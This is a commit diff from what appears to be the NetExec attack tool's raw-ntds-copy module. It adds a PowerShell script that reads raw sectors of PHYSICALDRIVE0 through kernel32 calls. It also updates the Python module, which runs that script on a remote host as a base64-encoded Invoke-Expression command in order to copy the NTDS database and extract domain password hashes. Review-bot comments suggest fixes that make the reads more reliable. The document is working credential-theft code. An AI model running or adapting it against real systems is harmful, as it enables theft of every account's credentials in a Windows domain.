
Commit 788ba90

committed
Move powershell script to file instead of b64 inline
1 parent f7fa1fa commit 788ba90

2 files changed

Lines changed: 110 additions & 4 deletions


Lines changed: 95 additions & 0 deletions
@@ -0,0 +1,95 @@
1+
Add-Type -TypeDefinition @"
2+
using System;
3+
using System.Runtime.InteropServices;
4+
using Microsoft.Win32.SafeHandles;
5+
6+
public class CNativeMethods
7+
{
8+
public const uint GENERIC_READ = 0x80000000;
9+
public const uint OPEN_EXISTING = 3;
10+
public const uint FILE_SHARE_READ = 0x00000001;
11+
public const uint FILE_SHARE_WRITE = 0x00000002;
12+
public const uint FILE_SHARE_DELETE = 0x00000004;
13+
14+
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
15+
public static extern SafeFileHandle CreateFile(
16+
string lpFileName,
17+
uint dwDesiredAccess,
18+
uint dwShareMode,
19+
IntPtr lpSecurityAttributes,
20+
uint dwCreationDisposition,
21+
uint dwFlagsAndAttributes,
22+
IntPtr hTemplateFile
23+
);
24+
25+
[DllImport("kernel32.dll", SetLastError = true)]
26+
public static extern bool ReadFile(
27+
SafeFileHandle hFile,
28+
byte[] lpBuffer,
29+
uint nNumberOfBytesToRead,
30+
out uint lpNumberOfBytesRead,
31+
IntPtr lpOverlapped
32+
);
33+
34+
[DllImport("kernel32.dll", SetLastError = true)]
35+
public static extern bool SetFilePointerEx(
36+
SafeFileHandle hFile,
37+
long lDistanceToMove,
38+
out long lpNewFilePointer,
39+
uint dwMoveMethod
40+
);
41+
}
42+
43+
public enum EMoveMethod : uint
44+
{
45+
Begin = 0,
46+
Current = 1,
47+
End = 2
48+
}
49+
"@
50+
Function read_disk{
51+
$offset = [long]$args[0]
52+
$size = [int]$args[1]
53+
try {
54+
$handle = [CNativeMethods]::CreateFile("\\.\PHYSICALDRIVE0",
55+
[CNativeMethods]::GENERIC_READ,
56+
[CNativeMethods]::FILE_SHARE_READ -bor [CNativeMethods]::FILE_SHARE_WRITE -bor [CNativeMethods]::FILE_SHARE_DELETE,
57+
[IntPtr]::Zero, [CNativeMethods]::OPEN_EXISTING, 0, [IntPtr]::Zero)
58+
59+
if ($handle.IsInvalid) {
60+
throw "Failed to create file handle"
61+
}
62+
63+
$moveToHigh = 0
64+
$success = [CNativeMethods]::SetFilePointerEx($handle, $offset, [ref]$moveToHigh, [EMoveMethod]::Begin)
65+
if (-not $success) {
66+
throw "Failed to set file pointer"
67+
}
68+
69+
$buffer = New-Object byte[] $size
70+
$bytesRead = 0
71+
$success = [CNativeMethods]::ReadFile($handle, $buffer, $size, [ref]$bytesRead, [IntPtr]::Zero)
72+
73+
if (-not $success) {
74+
throw "Failed to read file"
75+
}
76+
77+
$memoryStream = New-Object System.IO.MemoryStream
78+
$gzipStream = New-Object System.IO.Compression.GzipStream($memoryStream, [System.IO.Compression.CompressionMode]::Compress)
79+
$gzipStream.Write($buffer, 0, $buffer.Length)
80+
$gzipStream.Close()
81+
82+
$compressedBytes = $memoryStream.ToArray()
83+
$compressedBase64 = [Convert]::ToBase64String($compressedBytes)
84+
85+
Write-Output $compressedBase64
86+
} catch {
87+
Write-Error "An error occurred: $_"
88+
}
89+
90+
finally {
91+
if ($handle -and !$handle.IsInvalid) {
92+
$handle.Close()
93+
}
94+
}
95+
}
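Review bot: `$bytesRead` is discarded after the `ReadFile` call in `read_disk`, so a short read (for example when `offset + size` runs past the end of `\\.\PHYSICALDRIVE0`) silently compresses and returns all `$size` bytes of `$buffer`, with the unread tail being zero-filled buffer rather than disk data. Guard it right after the success check, `if ($bytesRead -ne $size) { throw "Short read: $bytesRead of $size bytes" }`, or pass `$bytesRead` instead of `$buffer.Length` to `$gzipStream.Write`. The three `throw` messages also drop the Win32 error code even though every P/Invoke declares `SetLastError = true`; appending `[Runtime.InteropServices.Marshal]::GetLastWin32Error()` to each message (e.g. `throw "Failed to create file handle (error $([Runtime.InteropServices.Marshal]::GetLastWin32Error()))"`) tells the operator whether the failure was access denied (non-elevated session) versus an unaligned offset. Raw device reads need sector-aligned `offset`/`size`, and the drive index is hard-coded to 0, so presumably the caller is expected to guarantee both; a comment at the top of `read_disk` stating those preconditions would make that explicit.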

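--- a/nxc/modules/raw-ntds-copy.py
+++ b/nxc/modules/raw-ntds-copy.py
@@ -1,7 +1,7 @@
 # raw-ntds-copy module for nxc
 # Author of the module : Bilal Github:@0xb11a1, X:@0xcc00
 
-import base64
+from base64 import b64decode, b64encode
 from os import makedirs
 from os.path import join, abspath
 from nxc.paths import TMP_PATH
@@ -12,6 +12,7 @@
 from io import BytesIO
 from impacket.examples.secretsdump import LocalOperations, NTDSHashes, SAMHashes
 from nxc.helpers.misc import validate_ntlm
+from nxc.helpers.powershell import get_ps_script
 
 
 class NXCModule:
@@ -62,6 +63,16 @@ class NXCModule:
         0x100: "$LOGGED_UTILITY_STREAM",
     }
 
+    def __init__(self):
+        ps_script = ""
+        with open(get_ps_script("raw_ntds_copy/raw_ntds_copy.ps1")) as psFile:
+            for line in psFile:
+                if line.startswith("#") or line.strip() == "":
+                    continue
+                else:
+                    ps_script += line.strip() + "\n"
+        self.ps_script_b64 = b64encode(ps_script.encode("UTF-16LE")).decode("utf-8")
+
     @dataclass
     class MFA_sector_properties:
         filename: str = ""
@@ -79,10 +90,10 @@ def read_from_disk(self, offset, size):
         fixed_size = size // 512 + 512 if size % 512 != 0 else size
         # scary base64 powershell code :)
         # This to read the PhysicalDrive0 file
-        Get_data_script = f"""powershell.exe -c "$base64Cmd = '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';$decodedCmd = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64Cmd)) + '; read_disk {offset} {fixed_size}'; Invoke-Expression $decodedCmd" """
-        data_output = self.execute(Get_data_script, True)
+        get_data_script = f"""powershell.exe -c "$base64Cmd = '{self.ps_script_b64}';$decodedCmd = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64Cmd)) + '; read_disk {offset} {fixed_size}'; Invoke-Expression $decodedCmd" """
+        data_output = self.execute(get_data_script, True)
         self.logger.debug(f"{offset=},{size=},{fixed_size=}")
-        compressed_bytes = base64.b64decode(data_output)[:size]
+        compressed_bytes = b64decode(data_output)[:size]
         compressed_stream = BytesIO(compressed_bytes)
 
         with gzip.GzipFile(fileobj=compressed_stream, mode="rb") as gzip_file: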
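Review bot: `compressed_bytes = b64decode(data_output)[:size]` slices the *compressed* stream to `size` bytes, but gzip output for high-entropy sectors (encrypted or already-compressed data) is larger than its input, so the slice can cut the gzip member short and the `gzip.GzipFile` read that follows either raises or yields a short buffer; the `[:size]` belongs on the decompressed payload, which is what was meant to be trimmed back from the `fixed_size` read. With the default `validate=False`, `b64decode` also silently drops non-alphabet characters, so when the script takes its `Write-Error` branch the error text decodes to garbage that only surfaces later as a gzip failure; `b64decode(data_output, validate=True)` fails at the source with a useful message. The `fixed_size` expression on the context line above looks off as well (`size // 512 + 512` for a 1000-byte request yields 513, smaller than the request), though that predates this commit. `read_from_disk` continues past the end of the hunk.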
